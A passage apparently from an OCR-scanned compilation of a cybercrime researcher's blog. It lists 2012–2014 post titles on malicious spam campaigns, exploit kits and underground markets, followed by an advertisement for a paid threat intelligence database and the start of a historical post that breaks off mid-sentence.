
• [131]American Airlines themed emails lead to the Black 
Hole Exploit Kit 

• [132]Bogus Facebook notifications lead to malware 

• [133]Spamvertised 'KLM E-ticket' themed emails serve 
malware 

• [134]'lntuit Payroll Confirmation inquiry' themed emails 
lead to the Black Hole exploit kit 

• [135]Malware campaign spreading via Facebook direct 
messages spotted in the wild 

• [136]'Regarding your Friendster password' themed emails 
lead to Black Hole exploit kit 

• [137]Russian cybercriminals release new DIY DDoS 
malware loader 

• [138]PayPal 'Notification of payment received' themed 
emails serve malware 



• [139]Cybercriminals impersonate Delta Airlines, serve 
malware 

• [140]'Your UPS Invoice is Ready' themed emails serve 
malware 

• [141]Bogus Skype 'Password successfully changed' 
notifications lead to malware 

• [142]Cybercriminals impersonate Verizon Wireless, serve 
client-side exploits and malware 

• [143]Spamvertised 'BT Business Direct Order' themed 
emails lead to malware 

• [144]Cybercriminals spamvertise millions of British Airways 
themed e-ticket receipts, serve malware 

• [145]Cybercriminals spamvertise millions of bogus 
Facebook notifications, serve malware 

• [146]Nuclear Exploit Pack goes 2.0 
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11. November - 2012 

• [147]BofA 'Online Banking Passcode Reset' themed emails 
serve client-side exploits and malware 

• [148]'ADP Immediate Notification' themed emails lead to 
Black Hole Exploit Kit 

• [149]USPS 'Postal Notification' themed emails lead to 
malware 

• [150]'Fwd: Scan from a Xerox W. Pro' themed emails lead to 
Black Hole Exploit Kit 



• [151]'Your Discover Card Services Blockaded' themed 
emails serve client-side exploits and malware 

• [152]'Payroll Account Molded by Intuit' themed emails lead 
to Black Hole Exploit Kit 

• [153]'American Express Alert: Your Transaction is Aborted' 
themed emails serve client-side exploits and mal¬ 
ware 

• [154]Cybercriminals abuse major U.S SMS gateways, 
release DIY Mail-to-SMS flooders 

• [155]'PayPal Account Modified' themed emails lead to 
Black Hole Exploit Kit 

• [156]Bogus Better Business Bureau themed notifications 
serve client-side exploits and malware 

• [157]Cybercriminals spamvertise bogus eFax Corporate 
delivery messages, serve multiple malware variants 

• [158]Bogus IRS 'Your tax return appeal is declined' themed 
emails lead to malware 

• [159]'Copies of Missing EPLI Policies' themed emails lead to 
Black Hole Exploit Kit 

• [160]Cybercriminals spamvertise bogus 'Microsoft License 
Orders' serve client-side exploits and malware 

• [161]Cybercriminals resume spamvertising 'Payroll Account 
Cancelled by Intuit' themed emails, serve client- 


side exploits and malware 



• [162]Cybercriminals spamvertise millions of FDIC 'Your 
activity is discontinued' themed emails, serve client-side 

exploits and malware 

• [163]Cybercriminals release stealthy DIY mass IFrame 
injecting Apache 2 modules 

• [164]Multiple 'Inter-company' invoice themed campaigns 
serve malware and client-side exploits 

• [165]Bogus Facebook 'pending notifications' themed 
emails serve client-side exploits and malware 

• [166]Cybercriminals target U.K users with bogus 'Pay by 
Phone Parking Receipts' serve malware 

• [167]Bogus DFIL 'Express Delivery Notifications' serve 
malware 

• [168]Cybercriminals impersonate Vodafone U.K, spread 
malicious MMS notifications 

• [169]Cybercriminals impersonate T-Mobile U.K, serve 
malware 

• [170]Bogus 'Meeting Reminder" themed emails serve 
malware 

• [171]Bogus 'Intuit Software Order Confirmations' lead to 
Black Flole Exploit Kit 

• [172]Bogus 'End of August Invoices' themed emails serve 
malware and client-side exploits 
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12. December - 2012 



• [173]DIY malicious domain name registering service 
spotted in the wild 

• [174]Fake 'FedEx Tracking Number' themed emails lead to 
malware 

• [175]Bogus'Facebook Account Cancellation Request' 
themed emails serve client-side exploits and malware 

• [176]Malicious 'Security Update for Banking Accounts' 
emails lead to Black Flole Exploit Kit 

• [177]A peek inside a boutique cybercrime-friendly E-shop - 
part five 

• [178]Fake 'Flight Reservation Confirmations' themed 
emails lead to Black Flole Exploit Kit 

• [179]Malicious 'Sendspace File Delivery Notifications' lead 
to Black Flole Exploit Kit 

• [180]Fake Chase 'Merchant Billing Statement' themed 
emails lead to malware 

• [181]Cybercriminals entice potential cybercriminals into 
purchasing bogus credit cards data 

• [182]Fake 'Change Facebook Color Theme' events lead to 
rogue Chrome extensions 

• [183]Fake 'Citi Account Alert' themed emails lead to Black 
Flole Exploit Kit 

• [184]Spamvertised 'Work at Flome" scams impersonating 
CNBC spotted in the wild 

• [185]Pharmaceutical scammers spamvertise YouTube 
themed emails, entice users into purchasing counterfeit 



drugs 


• [186]Cybercriminals resume spamvertising British Airways 
themed E-ticket receipts, serve malware 

• [187]Fake 'UPS Delivery Confirmation Failed' themed 
emails lead to Black Flole Exploit Kit 

12. January - 2013 

• [188]Spamvertised 'Your Recent eBill from Verizon Wireless' 
themed emails serve client-side exploits and mal¬ 
ware 

• [189]Fake BBB (Better Business Bureau) Notifications lead 
to Black Flole Exploit Kit 

• [190]'Attention! Changes in the bank reports!' themed 
emails lead to Black Flole Exploit Kit 

• [191]Fake 'You have made an Ebay purchase' themed 
emails lead to client-side exploits and malware 

• [192]A peek inside a boutique cybercrime-friendly E-shop - 
part six 

• [193]Black Flole Exploit Kit author's 'vertical market 
integration' fuels growth in malicious Web activity 

• [194]Spamvertised AlCPA themed emails serve client-side 
exploits and malware 

• [195]'Please confirm your U.S Airways online registration' 
themed emails lead to Black Flole Exploit Kit 

• [196]Malicious DIYJava applet distribution platforms going 
mainstream 



• [197]Fake 'ADP Speedy Notifications' lead to client-side 
exploits and malware 
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• [198]Cybercriminals release automatic CAPTCHA-solving 
bogus Youtube account generating tool 

• [199]'Batch Payment File Declined' EFTPS themed emails 
lead to Black Flole Exploit Kit 

• [200]Cybercriminals resume spamvertising fake Vodafone 
'A new picture or video message' themed emails, 

serve malware 

• [201]Leaked DIY malware generating tool spotted in the 
wild 

• [202]Email hacking for hire going mainstream - part three 

• [203]Android malware spreads through compromised 
legitimate Web sites 

• [204]Fake Intuit 'Direct Deposit Service Informer' themed 
emails lead to Black Flole Exploit Kit 

• [205]Fake Linkedin 'Invitation Notifications' themed emails 
lead to client-side exploits and malware 

• [206]Novice cybercriminals experiment with DIY 
ransomware tools 

• [207]Bogus 'Your Paypal Transaction Confirmation' themed 
emails lead to Black Flole Exploit Kit 

• [208]Fake 'FedEx Online Billing - Invoice Prepared to be 
Paid' themed emails lead to Black Flole Exploit Kit 



• [209]A peek inside a DIY password stealing malware 

• [210]Malicious'Facebook Account Cancellation Request" 
themed emails serve client-side exploits and malware 

12. February - 2013 

• [211]Fake Booking.com 'Credit Card was not Accepted' 
themed emails lead to malware 

• [212]Fake FedEx 'Tracking ID/Tracking Number/Tracking 
Detail' themed emails lead to malware 

• [213]'Your Kindle e-book Amazon receipt' themed emails 
lead to Black Flole Exploit Kit 

• [214]New DIY FITTP-based botnet tool spotted in the wild 

• [215]Mobile spammers release DIY phone number 
harvesting tool 

• [216]New underground service offers access to thousands 
of malware-infected hosts 

• [217]Targeted 'phone ring flooding' attacks as a service 
going mainstream 

• [218]Fake 'You've blocked/disabled your Facebook account' 
themed emails serve client-side exploits and mal¬ 
ware 

• [219]Spamvertised IRS 'Income Tax Refund Turned Down' 
themed emails lead to Black Hole Exploit Kit 

• [220]Malware propagates through localized Facebook Wall 
posts 



• [221]Malicious 'RE: Your Wire Transfer' themed emails serve 
client-side exploits and malware 

• [222]New underground E-shop offers access to hundreds of 
hacked PayPal accounts 

• [223]Fake 'Verizon Wireless Statement" themed emails 
lead to Black Hole Exploit Kit 

• [224]DIY malware cryptor as a Web service spotted in the 
wild 
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• [225]Malicious 'Data Processing Service' ACH File ID 
themed emails serve client-side exploits and malware 

• [226]How mobile spammers verify the validity of harvested 
phone numbers 

• [227]How much does it cost to buy 10,000 U.S.-based 
malware-infected hosts? 

13. March - 2013 

• [228]New DIY IRC-based DDoS bot spotted in the wild 

• [229]Cybercriminals release new Java exploits centered 
exploit kit 

• [230]Segmented Russian "spam leads" offered for sale 

• [231]New DIY hacked email account content grabbing tool 
facilitates cyber espionage on a mass scale 

• [232]New DIY unsigned malicious Java applet generating 
tool spotted in the wild 



• [233]Commercial Steam 'information harvester/mass group 
inviter' could lead to targeted fraudulent cam¬ 
paigns 

• [234]Fake BofA CashPro 'Online Digital Certificate" themed 
emails lead to malware 

• [235]Spamvertised BBB 'Your Accreditation Terminated" 
themed emails lead to Black Hole Exploit Kit 

• [236]New ZeuS source code based rootkit available for 
purchase on the underground market 

• [237]Cybercriminals resume spamvertising 'Re: Fwd: Wire 
Transfer' themed emails, serve client-side exploits 

and malware 

• [238]'ADP Package Delivery Notification' themed emails 
lead to Black Hole Exploit Kit 

• [239]Cybercrime-friendly community branded HTTP/SMTP 
based keylogger spotted in the wild 

• [240]Hacked PCs as 'anonymization stepping-stones' 
service operates in the open since 2004 

• [241]Fake 'CNN Breaking News Alerts' themed emails lead 
to Black Hole Exploit Kit 

• [242]Spotted: cybercriminals working on new Western 
Union based 'money mule management' script 

• [243]Malicious 'BBC Daily Email' Cyprus bailout themed 
emails lead to Black Hole Exploit Kit 

• [244]'ADP Payroll Invoice' themed emails lead to malware 



• [245]Terminated Wire Transfer Notification/ACH File ID" 
themed malicious campaigns lead to Black Hole Exploit 

Kit 

• [246]New DIY RDP-based botnet generating tool leaks in 
the wild 

• [247]A peek inside the EgyPack Web malware exploitation 
kit 

14. April - 2013 

• [248]DIY Java-based RAT (Remote Access Tool) spotted in 
the wild 

• [249]Spamvertised 'Re: Changelog as promised' themed 
emails lead to malware 
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• [250]Cybercrime-friendly service offers access to tens of 
thousands of compromised accounts 

• [251]Madi/Mahdi/Flashback OS X connected malware 
spreading through Skype 

• [252]Cybercriminals selling valid 'business card' data of 
company executives across multiple verticals 

• [253JA peek inside the 'Zerokit/Okit/ringO bundle' bootkit 

• [254JDIY Skype ring flooder offered for sale 

• [255]Spamvertised 'Your order for helicopter for the 
weekend' themed emails lead to malware 



• [256]A peek inside a 'life cycle aware' underground market 
ad for a private keylogger 

• [257]American Airlines 'You can download your ticket' 
themed emails lead to malware 

• [258]Cybercriminals offer spam-friendly SMTP servers for 
rent [259] 

• [260]How mobile spammers verify the validity of harvested 
phone numbers - part two 

• [261]A peek inside a (cracked) commercially available RAT 
(Remote Access Tool) 

• [262]DIY Russian mobile number harvesting tool spotted in 
the wild 

• [263]DIY SIP-based TDoS tool/number validity checker 
offered for sale 

• [264]CAPTCHA-solving Russian email account registration 
tool helps facilitate cybercrime 

• [265]Historical OSINT-The'Boston Marathon explosion' 
and 'Fertilizer plant explosion in Texas' themed mal¬ 
ware campaigns 

• [266]Fake 'DFIL Delivery Report' themed emails lead to 
malware 

• [267]Cybercriminals impersonate Bank of America (BofA), 
serve malware 

• [268]Flow fraudulent blackhat SEO monetizers apply 
Quality Assurance (QA) to their DIY doorway generators 



• [269]Managed 'Russian ransomware' as a service spotted in 
the wild 

15. May - 2013 

• [270]FedWire 'Your Wire Transfer' themed emails lead to 
malware 

• [271]A peek inside a CVE-2013-0422 exploiting DIY 
malicious Java applet generating tool 

• [272]New IRC/HTTP based DDoS bot wipes out competing 
malware 

• [273]New version of DIY Google Dorks based mass website 
hacking tool spotted in the wild 

• [274]Citibank 'Merchant Billing Statement' themed emails 
lead to malware 

• [275]Fake Amazon 'Your Kindle E-Book Order' themed 
emails circulating in the wild, lead to client-side exploits 

and malware 

• [276]Cybercriminals impersonate New York State's 
Department of Motor Vehicles (DMV), serve malware 

• [277]Cybercriminals offer FITTP-based keylogger for sale, 
accept Bitcoin 
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• [278]Newly launched E-shop for hacked PCs charges based 
on malware 'executions' 

• [279]New subscription-based 'stealth Bitcoin miner' 
spotted in the wild 



• [280]Fake 'Free Media Player' distributed via rogue 'Adobe 
Flash Player FID' advertisement 

• [281]New versatile and remote-controlled 
"Android.MouaBot" malware found in the wild 

• [282]Newly launched 'Magic Malware' spam campaign 
relies on bogus 'New MMS' messages 

• [283]Commercial 'form grabbing' rootkit spotted in the wild 

• [284]DIY malware cryptor as a Web service spotted in the 
wild - part two 

• [285]CVs and sensitive info soliciting email campaign 
impersonates NATO 

• [286]New commercially available DIY invisible Bitcoin 
miner spotted in the wild 

• [287]Fake 'Export License/Payment Invoice' themed emails 
lead to malware 

• [288]Compromised Indian government Web site leads to 
Black Flole Exploit Kit 

• [289]Cybercriminals resume spamvertising Citibank 
'Merchant Billing Statement' themed emails, serve mal¬ 
ware 

• [290]Marijuana-themed DDoS for hire service spotted in the 
wild 

• [291]Fake 'Vodafone U.K Images' themed malware serving 
spam campaign circulating in the wild 


16. June - 2013 



• [292]Compromised FTP/SSH account privilege-escalating 
mass iFrame embedding platform released on the un¬ 
derground marketplace 

• [293]New E-shop sells access to thousands of hacked PCs, 
accepts Bitcoin 

• [294]Pharmaceutical scammers impersonate Facebook's 
Notification System, entice users into purchasing coun¬ 
terfeit drugs 

• [295]iLivid ads lead to 'Searchqu Toolbar/Search Suite' PUA 
(Potentially Unwanted Application) 

• [296]Flacked Origin, Uplay, Flulu Plus, Netflix, Spotify, 
Skype, Twitter, Instagram, Tumbir, Freelancer accounts 

offered for sale 

• [297]Scammers impersonate the UN Refugee Agency 
(UNHCR), seek your credit card details 

• [298]Fake 'Unsuccessful Fax Transmission' themed emails 
lead to malware 

• [299]Tens of thousands of spamvertised emails lead to 
W32/Casonline 

• [300]Rogue ads lead to SafeMonitorApp Potentially 
Unwanted Application (PUA) 

• [301]How cybercriminals apply Quality Assurance (QA) to 
their malware campaigns before launching them 

• [302]Rogue ads target EU users, expose them to 
Win32/Toolbar.SearchSuite through the KingTranslate PUA 



• [303]New boutique iFrame crypting service spotted in the 
wild 
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• [304]Rogue 'Oops Video Player' attempts to visually social 
engineer users, mimicks Adobe Flash Player's installation 
process 

• [305]New E-Shop sells access to thousands of malware- 
infected hosts, accepts Bitcoin 

• [306]New subscription-based SFIA256/Scrypt supporting 
stealth DIY Bitcoin mining tool spotted in the wild 

• [307]Rogue 'Free Mozilla Firefox Download' ads lead to 
'InstallCore' Potentially Unwanted Application (PUA) 

• [308]SIP-based API-supporting fake caller ID/SMS number 
supporting DIY Russian service spotted in the wild 

• [309]Rogue 'Free Codec Pack' ads lead to Win32/lnstallCore 
Potentially Unwanted Application (PUA) 

• [310]Self-propagating ZeuS-based source code/binaries 
offered for sale 

• [311]Flow cybercriminals create and operate Android-based 
botnets 

17. July - 2013 

• [312]Cybercriminals experiment with Tor-based C &C, ring- 
3-rootkit empowered, SPDY form grabbing malware 

bot 



• [313]Deceptive ads targeting German users lead to the 
'W32/SomotoBetterlnstaller' Potentially Unwanted Ap¬ 
plication (PUA) 

• [314]Newly launched underground market service harvests 
mobile phone numbers on demand 

• [315]Novel ransomware tactic locks users' PCs, demands 
that they participate in a survey to get the unlock code 

• [316]Spamvertised 'Export License/Invoice Copy' themed 
emails lead to malware 

• [317]Cybercriminals spamvertise tens of thousands of fake 
'Your Booking Reservation at Westminster Hotel' 

themed emails, serve malware 

• [318]New commercially available mass FTP-based proxy¬ 
supporting doorway/malicious script uploading appli¬ 
cation spotted in the wild 

• [319]Fake 'iG04 Private Car Insurance Policy Amendment 
Certificate' themed emails lead to malware 

• [320]Tens of thousands of spamvertised emails lead to the 
Win32/PrimeCasino PUA (Potentially Unwanted 

Application) 

• [321]Spamvertised 'Vodafone U.K MMS ID/Fake Sage 50 
Payroll' themed emails lead to (identical) malware 

• [322]New commercially available Web-based 
WordPress/Joomla brute-forcing tool spotted in the wild 



• [323]Rogue ads targeting German users lead to 
Win32/lnstallBrain PUA (Potentially Unwanted Application) 

• [324]Yet another commercially available stealth 
Bitcoin/Litecoin mining tool spotted in the wild 

• [325]Protected: Deceptive 'Media Player Update' ads 
expose users to the rogue 'Video Downloader/Bundlore' 

Potentially Unwanted Application (PUA) 

• [326]Newly launched 'HTTP-based botnet setup as a 
service' empowers novice cybercriminals with bulletproof 

hosting capabilities 
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• [327]Fake 'Copy of Vodafone U.K Contract/Your Monthly 
Vodafone Bill is Ready/New MMS Received' themed 

emails lead to malware 

• [328]Rogue ads lead to the 'Free Player' Win32/Somoto 
Potentially Unwanted Application (PUA) 

• [329]How much does it cost to buy one thousand 
Russian/Eastern European based malware-infected hosts? 

• [330]Custom USB sticks bypassing Windows 7/8's AutoRu 
protection measure going mainstream 

• [331]DIY commercially-available 'automatic Web site 
hacking as a service' spotted in the wild 


18. August - 2013 



• [332]'Malware-infected hosts as stepping stones' service 
offers access to hundreds of compromised U.S based 

hosts 

• [333]New 'Hacked shells as a service' empowers 
cybercriminals with access to high page rank-ed Web sites 

• [334]Fake 'iPhone Picture Snapshot Message' themed 
emails lead to malware 

• [335]Malicious Bank of America (BofA) 'Statement of 
Expenses' themed emails lead to client-side exploits and 

malware 

• [336]Cybercriminals spamvertise fake '02 U.K MMS' 
themed emails, serve malware 

• [337]One-stop-shop for spammers offers DKIM-verified 
SMTP servers, harvested email databases and training 

to potential customers 

• [338]Fake 'Apple Store Gift Card' themed emails serve 
client-side exploits and malware 

• [339]Newly launched managed 'malware dropping' service 
spotted in the wild 

• [340]Cybercrime-friendly underground traffic exchange 
helps facilitate fraudulent and malicious activity 

• [341]From Vietnam with tens of millions of harvested 
emails, spam-ready SMTP servers and DIY spamming 


tools 



• [342]DIY Craigslist email collecting tools empower 
spammers with access to fresh/valid email addresses 

• [343]Bulletproof TDS/Doorways/Pharma/Spam/Warez 
hosting service operates in the open since 2009 

• [344]DIY automatic cybercrime-friendly 'redirectors 
generating' service spotted in the wild 

• [345]Cybercriminals offer spam-ready SMTP servers for 
rent/direct managed purchase 

• [346]Cybercrime-friendly underground traffic exchanges 
help facilitate fraudulent and malicious activity - part 

two 

19. September - 2013 

• [347]DIY malicious Android APK generating 'sensitive 
information stealer' spotted in the wild 

• [348]Web-based DNS amplification DDoS attack mode 
supporting PHP script spotted in the wild 

• [349]Managed Malicious Java Applets Hosting Service 
Spotted in the Wild 
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• [350]Affiliate network for mobile malware impersonates 
Google Play, tricks users into installing premium-rate SMS 
sending rogue apps 

• [351J419 advance fee fraudsters abuse CNN's 'Email This' 
Feature, spread Syrian Crisis themed scams 



• [352]Cybercriminals offer anonymous mobile numbers for 
'SMS activation', video tape the destruction of the 

SIM card on request 

• [353]Yet another 'malware-infected hosts as anonymization 
stepping stones' service offering access to hundreds 

of compromised hosts spotted in the wild 

• [354]Cybercriminals experiment with 'Socks4/Socks5/HTTP' 
malware-infected hosts based DIY DoS tool 

• [355]Cybercriminals sell access to tens of thousands of 
malware-infected Russian hosts 

• [356]Spamvertised "FDIC: Your business account" themed 
emails serve client-side exploits and malware 

• [357]Cybercriminals experiment with Android compatible, 
Python-based SQL injecting releases 

• [358]Newly launched E-shop offers access to hundreds of 
thousands of compromised accounts 

• [359]DIY commercial CAPTCHA-solving automatic email 
account registration tool available on the underground 

market since 2008 

• [360]Yet another subscription-based stealth Bitcoin mining 
tool spotted in the wild 

20. October - 2013 

• [361]A peek inside a Blackhat SEO/cybercrime-friendly 
doorways management platform 



• [362]Newly launched 'HTTP-based botnet setup as a 
service' empowers novice cybercriminals with bulletproof 

hosting capabilities - part two [363] 

• [364]'T-Mobile MMS message has arrived' themed emails 
lead to malware 

• [365]DDoS for hire vendor 'vertically integrates' starts 
offering TDoS attack capabilities 

• [366]Commercially available Blackhat SEO enabled multi- 
third-party product licenses empowered VPSs spotted 

in the wild 

• [367]New cybercrime-friendly iFrames-based E-shop for 
traffic spotted in the wild 

• [368]Cybercriminals offer spam-friendly SMTP servers for 
rent - part two 

• [369]Newly launched VDS-based cybercrime-friendly 
hosting provider helps facilitate fraudulent/malicious on¬ 
line activity 

• [370]Fake 'You have missed emails' GMail themed emails 
lead to pharmaceutical scams 

• [371]Compromised Turkish Government Web site leads to 
malware 

• [372]Novice cyberciminals offer commercial access to five 
mini botnets 

• [373]Spamvertised T-Mobile 'Picture ID Type:MMS" themed 
emails lead to malware 



• [374]Yet another Bitcoin accepting E-shop offering access 
to thousands of hacked PCs spotted in the wild 
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• [375]Malicious 'FW: File' themed emails lead to malware 

• [376]Mass iframe injection campaign leads to Adobe Flash 
exploits 

• [377]Rogue ads lead to the 'Mipony Download 
Accelerator/FunMoods Toolbar' PDA (Potentially Unwanted 
Ap¬ 


plication) 

• [378]A peek inside the administration panel of a 
standardized E-shop for compromised accounts 

• [379]U.K users targeted with fake 'Confirming your Sky 
offer' malware serving emails 

• [380]New DIY compromised hosts/proxies syndicating tool 
spotted in the wild 

• [381]Rogue ads lead to the 'EzDownloaderpro' PUA 
(Potentially Unwanted Application) 

• [382]Fake 'Scanned Image from a Xerox WorkCentre' 
themed emails lead to malware 

• [383]Fake 'Important: Company Reports' themed emails 
lead to malware 

• [384]Cybercriminals release new commercially available 
Android/BlackBerry supporting mobile malware bot 



• [385]Fake WhatsApp 'Voice Message Notification/1 New 
Voicemail' themed emails lead to malware 

21. November - 2013 

• [386]Google-dorks based mass Web site hacking/SQL 
injecting tool helps facilitate malicious online activity 

• [387]Deceptive ads lead to the SpyAlertApp PUA 
(Potentially Unwanted Application) 

• [388]Cybercriminals differentiate their 'access to 
compromised PCs' service proposition, emphasize on the 

prevalence of 'female bot slaves' 

• [389]New vendor of 'professional DDoS for hire service' 
spotted in the wild 

• [390]Source code for proprietary spam bot offered for sale, 
acts as force multiplier for cybercrime-friendly ac¬ 
tivity 

• [391]Low Quality Assurance (QA) iframe campaign linked 
to May's Indian government Web site compromise 

spotted in the wild 

• [392]Popular French torrent portal tricks users into 
installing the BubbleDock/Downware/DownloadWare PUA 

(Potentially Unwanted Application) 

• [393]Web site of Brazilian 'Prefeitura Municipal de Jaqueira' 
compromised, leads to fake Adobe Flash player 



• [394]Malicious multi-hop iframe campaign affects 
thousands of Web sites, leads to a cocktail of client-side 

exploits 

• [395]Vendor of TDoS products/services releases new multi¬ 
threaded SIP-based TDoS tool 

• [396]Cybercriminals spamvertise tens of thousands of fake 
'Sent from my iPhone' themed emails, expose users 

to malware 

• [397]Fake 'Annual Form (STD-261) - Authorization to Use 
Privately Owned Vehicle on State Business' themed 

emails lead to malware 

• [398]'Newly released proxy-supporting Origin brute-forcing 
tools targets users with weak passwords' 
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• [399]Fake WhatsApp 'Voice Message Notification' themed 
emails expose users to malware 

• [400]Cybercriminals impersonate FISBC through fake 
'payment e-Advice' themed emails, expose users to mal¬ 
ware 

• [401]Fake 'MMS Gallery' notifications impersonate T-Mobile 
U.K, expose users to malware 

• [402]Fake 'October's Billing Address Code' (BAC) form 
themed spam campaign leads to malware 


21. December - 2013 



• [403]Cybercrime-friendly VPN service provider pitches 
itself as being 'recommended by Edward Snowden' 

• [404]Commercial Windows-based compromised Web shells 
management application spotted in the wild 

• [405]Compromised legitimate Web sites expose users to 
malicious Java/Symbian/Android "Browser Updates" 

• [406]Malicious multi-hop iframe campaign affects 
thousands of Web sites, leads to a cocktail of client-side 

exploits - part two 

• [407]How cybercriminals efficiently violate YouTube, 
Facebook, Twitter, Instagram, SoundCloud and Google-F's 

ToS 

• [408]Tumblr under fire from DIY CAPTCHA-solving, proxies- 
supporting automatic account registration tools 

• [409]Newly launched 'HTTP-based botnet setup as a 
service' empowers novice cybercriminals with bulletproof 

hosting capabilities - part three 

• [410]Cybercriminals offer fellow cybercriminalstraining in 
Operational Security (OPSEC) 

• [411]Fake 'WhatsApp Missed Voicemail' themed emails 
lead to pharmaceutical scams 

• [412]A peek inside the booming underground market for 
stealth Bitcoin/Litecoin mining tools 

• [413]Cybercrime Trends 2013 - Year in Review 



22. January - 2014 


• [414]'Adobe License Service Center Order NR' and 'Notice 
to appear in court' themed malicious spam campaigns 

intercepted in the wild 

• [415]Vendor of TDoS products resets market life cycle of 
well known 3G USB modem/GSM/SIM card-based 

TDoS tool 

• [416]New TDoS market segment entrant introduces 96 SIM 
cards compatible custom GSM module, positions 

itself as market disrupter 

• [417]DIY Python-based mass insecure WordPress 
scanning/exploting tool with hundreds of pre-defined exploits 

spotted in the wild 

• [418]Google's reCAPTCHA under automatic fire from a 
newly launched reCAPTCHA-solving/breaking service 

• [419]Fully automated, API-supporting service, undermines 
Facebook and Google's 'SMS/Mobile number acti¬ 
vation' account registration process 
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• [420]Newly launched managed 'compromised/hacked 
accounts E-shop hosting as service' standardizes the 


monetization process 



• [421]Newly released Web based DDoS/Passwords stealing- 
capable DIY botnet generating tool spotted in the 

wild 

• [422]Cybercriminals release new Web based keylogging 
system, rely on penetration pricing to gain market share 

23. February - 2014 

• [423]Cybercriminals release Socks4/Socks5 based Alexa 
PageRank boosting application 

• [424]Market leading 'standardized cybercrime-friendly E- 
shop' service brings 2500-1- boutique E-shops online 

• [425]Managed TeamViewer based anti-forensics capable 
virtual machines offered as a service 

• [426]Malicious campaign relies on rogue Word Press sites, 
leads to client-side exploits through the Magnitude 

exploit kit 

• [427]'Hacking for hire' teams occupy multiple underground 
market segments, monetize their malicious 'know 

how' 

• [428]DoubleClick malvertising campaign exposes long-run 
beneath the radar malvertising infrastructure 

• [429]Spamvertised 'Image has been sent' Evernote themed 
campaign serves client-side exploits 

• [430]Spamvertised 'You received a new message from 
Skype voicemail service' themed emails lead to Angler 



exploit kit 

24. March - 2014 

• [431]Deceptive ads expose users to PUA.InstallBrain/PC 
Performer PUA (Potentially Unwanted Application) 

• [432]Managed Web-based 300 GB/s capable DNS 
amplification enabled malware bot spotted in the wild 

• [433]Commercial Windows-based compromised Web shells 
management application spotted in the wild - part 

two 

• [434]Multiple spamvertised bogus online casino themed 
campaigns intercepted in the wild 

• [435]5M-i- harvested Russian mobile numbers service 
exposes fraudulent infrastructure 

• [436]Socks4/Socks5 enabled hosts as a service introduces 
affiliate network based revenue sharing scheme 

• [437]A peek inside a modular, Tor C &C enabled, Bitcoin 
mining malware bot 

• [438]Managed anti-forensics IMEI modification services fuel 
growth in the non-attributable TDoS market seg¬ 
ment 

• [439]Commercially available database of 52M-I- ccTLD zone 
transfer domains spotted in the wild 

• [440]Deceptive ads expose users to the 

Adware.Linkular/Win32.SpeedUpMyPC.A PUAs (Potentially 
Unwanted 



Applications) 
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• [441]DIY automatic cybercrime-friendly 'redirector 
generating' service spotted in the wild - part two 

• [442]Managed DDoS Word Press-targeting, XML-RPC API 
abusing service, spotted in the wild 

24. May - 2014 

• [443]Legitimate software apps impersonated in a blackhat 
SEO-friendly PUA (Potentially Unwanted Application) 

serving campaign 

• [444]DIY cybercrime-friendly (legitimate) APK 
injecting/decompiling app spotted in the wild 

• [445]Malicious DIYJava applet distribution platforms going 
mainstream - part two 

• [446]Spamvertised 'Error in calculation of your tax' themed 
emails lead to malware 

• [447]A peek inside a subscription-based DIY keylogging 
based type of botnet/malware generating tool 

• [448]Spamvertised 'Notification of payment received' 
themed emails lead to malware 

• [449]Malicious JJ Black Consultancy 'Computer Support 
Services' themed emails lead to malware 

• [450]A peek inside a newly launched all-in-one E-shop for 
cybercrime-friendly services 



• [451]Long run compromised accounting data based type of 
managed iframe-ing service spotted in the wild 

Enjoy! 
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THE WORLD'S LEADING EXPERT IN 
CYBERCRIME AND CYBER SECURITY PRESENTS 
THE WORLD'S MOST COMPREHENSIVE CYBER 
THREATS DATABASE 

Russian Businnoss Network Coverage - Koobface 
Botnet Coverage - Kneber Botnet Coverage - 
Hundreds of lOCs (Indicators of Compromise) - 
Tactics Techniques and Procedures - In-Oepth 
Coverage - Malicious and Fraudulent infrastructure 
Mapped and Exposed - Malicious and Fraudulent 
Blackahat SEO Coverage - Malicious Spam and 
Phishing Campaigns Coverage - Malicious and 
Fraudulent Scareware Campaigns Coverage 


Introducing Threat Data - The World's Most 
Comprehensive Threats Database (2018-09-20 16:30) 

Dear blog readers, I wanted to take the time and effort and 
introduce you to Threat Data - the World's Most Compre¬ 
hensive Threats Database, a proprietary invite-only MISP- 
based data information and knowledge sharing community 



managed and operated by me which basically represents the 
vast majority of proprietary threat intelligence research 

that I produce on a daily basis these days. 

Users and organizations familiar with my research may be 
definitely interested in considering the opportunity 

to obtain access to Threat Data including a possible sample 
including a possible trial of the service. 

Find below a sample FAQ about Threat Data and consider 
obtaining access to ensure that you and your orga¬ 
nization remains on the top of its game including ahead of 
current and emerging threats. 

01. How to request access including a possible trial 
including API access? 
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Approach me at ddanchev(g)cryptogroup.net 

02. How do obtain automated access? 

The database is delivered daily/weekly/quarterly in MISP- 
friendly JSON-capable format including STIX coverage. 

03. How to request a sample? 

Users interested in requesting a sample can approach me at 
dancho.danchev(g)hush.com and I'd be more than happy 

to offer a recent threat intelligence research snapshot. 

04. Tell me more about the pricing options? 



Monthly subscriptions covering daily weekly and monthly 
updates start at $4,000 including guaranteed access to 

24-32 analysis on a daily basis including active in-house all¬ 
source analysis guaranteeing that your organization 

remains on the top of its game by possessing the necessary 
data information and knowledge to stay ahead of current 

and emerging threats. 

05. What does the database cover? 

- Russian Business Network coverage 

- Koobface Botnet coverage 

- Kneber Botnet coverage 

- Hundreds of lOCs (Indicators of Compromise) 

- Tactics Techniques and Procedures In-Depth Coverage 

- Malicious and fraudulent infrastructure mapped and 
exposed 

- Malicious and fraudulent Blackhat SEO coverage 

- Malicious spam and phishing campaigns 

- Malicious and fraudulent scareware campaigns 

- Malicious and fraudulent money mule recruitment scams 

- Malicious and fraudulent reshipping mule recruitment 
scams 

- Web based mass attack compromise fraudulent and 
malicious campaigns 



- Malicious and fraudulent client-side exploits serving 
campaigns 

The database also offers active malverising, scareware, 
rogueware, malware, phishing, spam, IM malware, mo¬ 
bile malware, mac OS X malware, android malware, blackhat 
SEO, money mule recruitment, reshipping mule 

recruitment, including ransomware coverage. 

06. How often does it update? 

Updates as issued on a daily weekly monthly basis 
guaranteeing unlimited access to in-house analysis all-source 

analysis guaranteeing access to daily weekly and monthly 
updates. 

Enjoy! 
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Historical OSINT - iPowerWeb Hacked Hundreds of 
Web Sites Affected (2018-10-19 18:17) 

In 2008 it became evident that a widespread malware- 
embedded attack took place successfully affecting hundreds 

of iPowerWeb customers potentially exposing hundreds of 
legitimate Web sites to a multi-tude of malicious software 


courtesy of a well known [l]Russian Business Network's 
